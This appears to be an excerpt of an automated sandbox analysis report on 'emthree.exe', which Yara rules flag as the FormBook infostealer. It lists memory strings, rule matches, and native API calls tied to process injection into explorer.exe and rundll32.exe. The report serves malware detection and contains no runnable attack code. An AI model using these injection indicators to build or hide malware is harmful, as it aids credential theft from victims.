Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

Source: emthree.exe, 00000000.00000002.238716419.00000000016B0000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.emthree.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.emthree.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.emthree.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.emthree.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.emthree.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.emthree.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0041A070 NtClose,	1_2_0041A070
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0041A120 NtAllocateVirtualMemory,	1_2_0041A120
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00419F40 NtCreateFile,	1_2_00419F40
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00419FF0 NtReadFile,	1_2_00419FF0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0041A06B NtClose,	1_2_0041A06B
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0041A03A NtReadFile,	1_2_0041A03A
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01029910 NtAdjustPrivilegesToken,LdrInitializeThunk,	1_2_01029910
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010299A0 NtCreateSection,LdrInitializeThunk,	1_2_010299A0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01029840 NtDelayExecution,LdrInitializeThunk,	1_2_01029840
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01029860 NtQuerySystemInformation,LdrInitializeThunk,	1_2_01029860
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010298F0 NtReadVirtualMemory,LdrInitializeThunk,	1_2_010298F0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01029A00 NtProtectVirtualMemory,LdrInitializeThunk,	1_2_01029A00
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01029A20 NtResumeThread,LdrInitializeThunk,	1_2_01029A20
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01029A50 NtCreateFile,LdrInitializeThunk,	1_2_01029A50
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01029540 NtReadFile,LdrInitializeThunk,	1_2_01029540
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010295D0 NtClose,LdrInitializeThunk,	1_2_010295D0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01029710 NtQueryInformationToken,LdrInitializeThunk,	1_2_01029710
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01029780 NtMapViewOfSection,LdrInitializeThunk,	1_2_01029780
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010297A0 NtUnmapViewOfSection,LdrInitializeThunk,	1_2_010297A0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01029660 NtAllocateVirtualMemory,LdrInitializeThunk,	1_2_01029660
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010296E0 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_010296E0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01029950 NtQueueApcThread,	1_2_01029950
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010299D0 NtCreateProcessEx,	1_2_010299D0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01029820 NtEnumerateKey,	1_2_01029820
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0102B040 NtSuspendThread,	1_2_0102B040
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010298A0 NtWriteVirtualMemory,	1_2_010298A0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01029B00 NtSetValueKey,	1_2_01029B00
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0102A3B0 NtGetContextThread,	1_2_0102A3B0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01029A10 NtQuerySection,	1_2_01029A10
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01029A80 NtOpenDirectoryObject,	1_2_01029A80
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01029520 NtWaitForSingleObject,	1_2_01029520
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0102AD30 NtSetContextThread,	1_2_0102AD30
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01029560 NtWriteFile,	1_2_01029560
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010295F0 NtQueryInformationFile,	1_2_010295F0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0102A710 NtOpenProcessToken,	1_2_0102A710
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01029730 NtQueryVirtualMemory,	1_2_01029730
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01029760 NtOpenProcess,	1_2_01029760
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0102A770 NtOpenThread,	1_2_0102A770
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01029770 NtSetInformationFile,	1_2_01029770
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01029FE0 NtCreateMutant,	1_2_01029FE0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01029610 NtEnumerateValueKey,	1_2_01029610
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01029650 NtQueryValueKey,	1_2_01029650
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01029670 NtQueryInformationProcess,	1_2_01029670
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010296D0 NtCreateKey,	1_2_010296D0
Source: C:\Windows\explorer.exe	Code function: 2_2_06D51A52 NtCreateFile,	2_2_06D51A52
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE95D0 NtClose,LdrInitializeThunk,	6_2_04EE95D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE9540 NtReadFile,LdrInitializeThunk,	6_2_04EE9540
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE96E0 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_04EE96E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE96D0 NtCreateKey,LdrInitializeThunk,	6_2_04EE96D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE9660 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_04EE9660
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE9650 NtQueryValueKey,LdrInitializeThunk,	6_2_04EE9650
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE9FE0 NtCreateMutant,LdrInitializeThunk,	6_2_04EE9FE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE9780 NtMapViewOfSection,LdrInitializeThunk,	6_2_04EE9780
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE9710 NtQueryInformationToken,LdrInitializeThunk,	6_2_04EE9710
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE9860 NtQuerySystemInformation,LdrInitializeThunk,	6_2_04EE9860
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE9840 NtDelayExecution,LdrInitializeThunk,	6_2_04EE9840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE99A0 NtCreateSection,LdrInitializeThunk,	6_2_04EE99A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	6_2_04EE9910
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE9A50 NtCreateFile,LdrInitializeThunk,	6_2_04EE9A50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE95F0 NtQueryInformationFile,	6_2_04EE95F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE9560 NtWriteFile,	6_2_04EE9560
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE9520 NtWaitForSingleObject,	6_2_04EE9520
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EEAD30 NtSetContextThread,	6_2_04EEAD30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE9670 NtQueryInformationProcess,	6_2_04EE9670
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE9610 NtEnumerateValueKey,	6_2_04EE9610
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE97A0 NtUnmapViewOfSection,	6_2_04EE97A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE9760 NtOpenProcess,	6_2_04EE9760
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EEA770 NtOpenThread,	6_2_04EEA770
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE9770 NtSetInformationFile,	6_2_04EE9770
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE9730 NtQueryVirtualMemory,	6_2_04EE9730
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EEA710 NtOpenProcessToken,	6_2_04EEA710
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE98F0 NtReadVirtualMemory,	6_2_04EE98F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE98A0 NtWriteVirtualMemory,	6_2_04EE98A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EEB040 NtSuspendThread,	6_2_04EEB040
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE9820 NtEnumerateKey,	6_2_04EE9820
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE99D0 NtCreateProcessEx,	6_2_04EE99D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE9950 NtQueueApcThread,	6_2_04EE9950
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE9A80 NtOpenDirectoryObject,	6_2_04EE9A80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE9A20 NtResumeThread,	6_2_04EE9A20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE9A00 NtProtectVirtualMemory,	6_2_04EE9A00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE9A10 NtQuerySection,	6_2_04EE9A10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EEA3B0 NtGetContextThread,	6_2_04EEA3B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EE9B00 NtSetValueKey,	6_2_04EE9B00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_02DAA070 NtClose,	6_2_02DAA070
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_02DAA120 NtAllocateVirtualMemory,	6_2_02DAA120
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_02DA9FF0 NtReadFile,	6_2_02DA9FF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_02DA9F40 NtCreateFile,	6_2_02DA9F40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_02DAA06B NtClose,	6_2_02DAA06B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_02DAA03A NtReadFile,	6_2_02DAA03A

Source: C:\Users\user\Desktop\emthree.exe	Code function: 0_2_032AC164	0_2_032AC164
Source: C:\Users\user\Desktop\emthree.exe	Code function: 0_2_032AE5A2	0_2_032AE5A2
Source: C:\Users\user\Desktop\emthree.exe	Code function: 0_2_032AE5B0	0_2_032AE5B0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00401030	1_2_00401030
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0041E423	1_2_0041E423
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00402D87	1_2_00402D87
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00402D90	1_2_00402D90
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00409E40	1_2_00409E40
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0041D73D	1_2_0041D73D
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00402FB0	1_2_00402FB0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01004120	1_2_01004120
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FFB090	1_2_00FFB090
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010099BF	1_2_010099BF
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A1002	1_2_010A1002
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010BE824	1_2_010BE824
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A830	1_2_0100A830
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010120A0	1_2_010120A0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010B20A8	1_2_010B20A8
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010B28EC	1_2_010B28EC
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FEF900	1_2_00FEF900
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100A309	1_2_0100A309
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010B2B28	1_2_010B2B28
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0100AB40	1_2_0100AB40
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101EBB0	1_2_0101EBB0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A03DA	1_2_010A03DA
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010ADBD2	1_2_010ADBD2
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0101ABD8	1_2_0101ABD8
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010923E3	1_2_010923E3
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_0109FA2B	1_2_0109FA2B
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010B22AE	1_2_010B22AE
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A4AEF	1_2_010A4AEF
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010B2D07	1_2_010B2D07
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010B1D55	1_2_010B1D55
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01012581	1_2_01012581
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010B25DD	1_2_010B25DD
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FF841F	1_2_00FF841F
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FFD5E0	1_2_00FFD5E0
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010AD466	1_2_010AD466
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010A4496	1_2_010A4496
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_00FE0D20	1_2_00FE0D20
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010BDFCE	1_2_010BDFCE
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010B1FF1	1_2_010B1FF1
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010AD616	1_2_010AD616
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_01006E30	1_2_01006E30
Source: C:\Users\user\Desktop\emthree.exe	Code function: 1_2_010B2EF7	1_2_010B2EF7
Source: C:\Windows\explorer.exe	Code function: 2_2_06D51A52	2_2_06D51A52
Source: C:\Windows\explorer.exe	Code function: 2_2_06D49CF2	2_2_06D49CF2
Source: C:\Windows\explorer.exe	Code function: 2_2_06D49CE9	2_2_06D49CE9
Source: C:\Windows\explorer.exe	Code function: 2_2_06D50882	2_2_06D50882
Source: C:\Windows\explorer.exe	Code function: 2_2_06D48072	2_2_06D48072
Source: C:\Windows\explorer.exe	Code function: 2_2_06D48069	2_2_06D48069
Source: C:\Windows\explorer.exe	Code function: 2_2_06D54A0C	2_2_06D54A0C
Source: C:\Windows\explorer.exe	Code function: 2_2_06D4F152	2_2_06D4F152
Source: C:\Windows\explorer.exe	Code function: 2_2_06D4CB1F	2_2_06D4CB1F
Source: C:\Windows\explorer.exe	Code function: 2_2_06D4CB22	2_2_06D4CB22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F64496	6_2_04F64496
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F6D466	6_2_04F6D466
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EB841F	6_2_04EB841F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EBD5E0	6_2_04EBD5E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F725DD	6_2_04F725DD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04ED2581	6_2_04ED2581
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F62D82	6_2_04F62D82
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F71D55	6_2_04F71D55
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EA0D20	6_2_04EA0D20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F72D07	6_2_04F72D07
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F72EF7	6_2_04F72EF7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EC6E30	6_2_04EC6E30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F6D616	6_2_04F6D616
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F71FF1	6_2_04F71FF1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F7DFCE	6_2_04F7DFCE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F728EC	6_2_04F728EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04ED20A0	6_2_04ED20A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F720A8	6_2_04F720A8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EBB090	6_2_04EBB090
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F7E824	6_2_04F7E824
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04ECA830	6_2_04ECA830
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F61002	6_2_04F61002
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EC99BF	6_2_04EC99BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EC4120	6_2_04EC4120
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EAF900	6_2_04EAF900
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F64AEF	6_2_04F64AEF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F722AE	6_2_04F722AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F5FA2B	6_2_04F5FA2B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F523E3	6_2_04F523E3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F6DBD2	6_2_04F6DBD2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F603DA	6_2_04F603DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EDABD8	6_2_04EDABD8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04EDEBB0	6_2_04EDEBB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04ECAB40	6_2_04ECAB40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04F72B28	6_2_04F72B28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04ECA309	6_2_04ECA309
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_02D99E40	6_2_02D99E40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_02D92FB0	6_2_02D92FB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_02DAD73D	6_2_02DAD73D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_02DAE423	6_2_02DAE423
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_02D92D90	6_2_02D92D90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_02D92D87	6_2_02D92D87

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 04EAB150 appears 133 times
Source: C:\Users\user\Desktop\emthree.exe	Code function: String function: 00FEB150 appears 124 times

Source: emthree.exe	Binary or memory string: OriginalFilename vs emthree.exe
Source: emthree.exe, 00000000.00000002.238716419.00000000016B0000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs emthree.exe
Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameMARCUS.dll4 vs emthree.exe
Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameB2B.exe4 vs emthree.exe
Source: emthree.exe	Binary or memory string: OriginalFilename vs emthree.exe
Source: emthree.exe, 00000001.00000002.276207579.0000000000BBB000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameRUNDLL32.EXEj% vs emthree.exe
Source: emthree.exe, 00000001.00000002.276372802.00000000010DF000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs emthree.exe
Source: emthree.exe	Binary or memory string: OriginalFilename vs emthree.exe

Source: C:\Windows\SysWOW64\rundll32.exe

Section loaded: sfc.dll

Jump to behavior

Source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
